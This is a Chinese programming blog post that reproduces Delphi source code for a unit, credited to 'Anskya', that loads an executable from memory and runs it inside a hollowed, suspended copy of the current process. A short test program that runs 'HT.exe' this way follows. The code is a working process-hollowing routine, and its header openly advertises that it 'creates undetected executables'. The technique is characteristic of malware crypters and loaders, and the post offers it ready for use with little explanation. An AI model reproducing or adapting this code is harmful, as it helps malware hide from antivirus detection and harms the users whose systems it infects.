从内存中加载并运行(二)

原创 2007年10月08日 08:16:00
{
   EXE Memory Unit Two For NT,2K,XP,2K3,LH By Anskya
   Email:Anskya@Gmail.com
   Web:Www.Anskya.Net
   Date:04.08.2005
   Thank:Aphex
  
   procedure MemoryRunExe(FileMemory: Pointer);
   [
     This program creates undetected executables that only run
     on Windows NT, 2000, XP, 2003 and LongHorn.   ??
   ]
}
Unit MemoryRunUnitTwo;

interface

{$IMAGEBASE $10000000}

uses
   Windows;

type
   TSections = array [0..0] of TImageSectionHeader;

procedure MemoryRunExe(FileMemory: Pointer);

implementation

function GetAlignedSize(Size: dword; Alignment: dword): dword;
begin
   if ((Size mod Alignment) = 0) then
   begin
     Result := Size;
   end
   else
   begin
     Result := ((Size div Alignment) + 1) * Alignment;
   end;
end;

function ImageSize(Image: pointer): dword;
var
   Alignment: dword;
   ImageNtHeaders: PImageNtHeaders;
   PSections: ^TSections;
   SectionLoop: dword;
begin
   ImageNtHeaders := pointer(dword(dword(Image)) + dword(PImageDosHeader(Image)._lfanew));
   Alignment := ImageNtHeaders.OptionalHeader.SectionAlignment;
   if ((ImageNtHeaders.OptionalHeader.SizeOfHeaders mod Alignment) = 0) then
   begin
     Result := ImageNtHeaders.OptionalHeader.SizeOfHeaders;
   end
   else
   begin
     Result := ((ImageNtHeaders.OptionalHeader.SizeOfHeaders div Alignment) + 1) * Alignment;
   end;
   PSections := pointer(pchar(@(ImageNtHeaders.OptionalHeader)) + ImageNtHeaders.FileHeader.SizeOfOptionalHeader);
   for SectionLoop := 0 to ImageNtHeaders.FileHeader.NumberOfSections - 1 do
   begin
     if PSections[SectionLoop].Misc.VirtualSize <> 0 then
     begin
       if ((PSections[SectionLoop].Misc.VirtualSize mod Alignment) = 0) then
       begin
         Result := Result + PSections[SectionLoop].Misc.VirtualSize;
       end
       else
       begin
         Result := Result + (((PSections[SectionLoop].Misc.VirtualSize div Alignment) + 1) * Alignment);
       end;
     end;
   end;
end;

procedure MemoryRunExe(FileMemory: Pointer);
var
   BaseAddress, Bytes, HeaderSize, InjectSize,   SectionLoop, SectionSize: dword;
   Context: TContext;
   FileData: pointer;
   ImageNtHeaders: PImageNtHeaders;
   InjectMemory: pointer;
   ProcInfo: TProcessInformation;
   PSections: ^TSections;
   StartInfo: TStartupInfo;
begin
   ImageNtHeaders := pointer(dword(dword(FileMemory)) + dword(PImageDosHeader(FileMemory)._lfanew));
   InjectSize := ImageSize(FileMemory);
   GetMem(InjectMemory, InjectSize);
   try
     FileData := InjectMemory;
     HeaderSize := ImageNtHeaders.OptionalHeader.SizeOfHeaders;
     PSections := pointer(pchar(@(ImageNtHeaders.OptionalHeader)) + ImageNtHeaders.FileHeader.SizeOfOptionalHeader);
     for SectionLoop := 0 to ImageNtHeaders.FileHeader.NumberOfSections - 1 do
     begin
       if PSections[SectionLoop].PointerToRawData < HeaderSize then HeaderSize := PSections[SectionLoop].PointerToRawData;
     end;
     CopyMemory(FileData, FileMemory, HeaderSize);
     FileData := pointer(dword(FileData) + GetAlignedSize(ImageNtHeaders.OptionalHeader.SizeOfHeaders, ImageNtHeaders.OptionalHeader.SectionAlignment));
     for SectionLoop := 0 to ImageNtHeaders.FileHeader.NumberOfSections - 1 do
     begin
       if PSections[SectionLoop].SizeOfRawData > 0 then
       begin
         SectionSize := PSections[SectionLoop].SizeOfRawData;
         if SectionSize > PSections[SectionLoop].Misc.VirtualSize then SectionSize := PSections[SectionLoop].Misc.VirtualSize;
         CopyMemory(FileData, pointer(dword(FileMemory) + PSections[SectionLoop].PointerToRawData), SectionSize);
         FileData := pointer(dword(FileData) + GetAlignedSize(PSections[SectionLoop].Misc.VirtualSize, ImageNtHeaders.OptionalHeader.SectionAlignment));
       end
       else
       begin
         if PSections[SectionLoop].Misc.VirtualSize <> 0 then FileData := pointer(dword(FileData) + GetAlignedSize(PSections[SectionLoop].Misc.VirtualSize, ImageNtHeaders.OptionalHeader.SectionAlignment));
       end;
     end;
     ZeroMemory(@StartInfo, SizeOf(StartupInfo));
     ZeroMemory(@Context, SizeOf(TContext));
     CreateProcess(nil, pchar(ParamStr(0)), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
     Context.ContextFlags := CONTEXT_FULL;
     GetThreadContext(ProcInfo.hThread, Context);
     ReadProcessMemory(ProcInfo.hProcess, pointer(Context.Ebx + 8), @BaseAddress, 4, Bytes);
     VirtualAllocEx(ProcInfo.hProcess, pointer(ImageNtHeaders.OptionalHeader.ImageBase), InjectSize, MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE);
     WriteProcessMemory(ProcInfo.hProcess, pointer(ImageNtHeaders.OptionalHeader.ImageBase), InjectMemory, InjectSize, Bytes);
     WriteProcessMemory(ProcInfo.hProcess, pointer(Context.Ebx + 8), @ImageNtHeaders.OptionalHeader.ImageBase, 4, Bytes);
     Context.Eax := ImageNtHeaders.OptionalHeader.ImageBase + ImageNtHeaders.OptionalHeader.AddressOfEntryPoint;
     SetThreadContext(ProcInfo.hThread, Context);
     ResumeThread(ProcInfo.hThread);
   finally
     FreeMemory(InjectMemory);
   end;
end;

end.

{
写了一个简单程序测试通过:)
}
program Test1;

//{$APPTYPE CONSOLE}

uses
   SysUtils,
   Classes,
   MemoryRunUnitTwo in 'MemoryRunUnitTwo.pas';

var
     ABuffer: array of byte;
     Stream: TFileStream;
     ProcessId: Cardinal;
begin
     Stream := TFileStream.Create('HT.exe', fmOpenRead);
     try
         SetLength(ABuffer, Stream.Size);
         Stream.ReadBuffer(ABuffer[0], Stream.Size);
         MemoryRunExe(@ABuffer[0]);
     finally
         Stream.Free;
     end;
end. 

易语言 - 内存中加载运行EXE源码

  • 2017年11月18日 14:12
  • 506KB
  • 下载

内存中加载并运行EXE程序

  • 2011年02月21日 10:27
  • 544KB
  • 下载

caffe使用MemoryDataLayer从内存中加载数据

caffe使用MemoryDataLayer从内存中加载数据 时间:2015-07-22 20:56:49      阅读:97      评论:0      收藏:0      [点我...

内存中加载运行EXE

  • 2013年08月07日 15:50
  • 1.75MB
  • 下载

caffe使用MemoryDataLayer从内存中加载数据

从内存中导入caffe的测试数据
  • xueyunf
  • xueyunf
  • 2015年07月22日 19:53
  • 3382

内存中加载dll

  • 2012年12月19日 14:18
  • 23KB
  • 下载

从内存资源中加载DLL:CMemLoadDll源码整理

头文件 /*****MemLoadDll.h*****/ #if !defined(Q_OS_LINUX) #pragma once typedef BOOL (__stdcall *Pro...

内存中加载dll

  • 2013年05月15日 15:07
  • 5KB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:从内存中加载并运行(二)
举报原因:
原因补充:

(最多只允许输入30个字)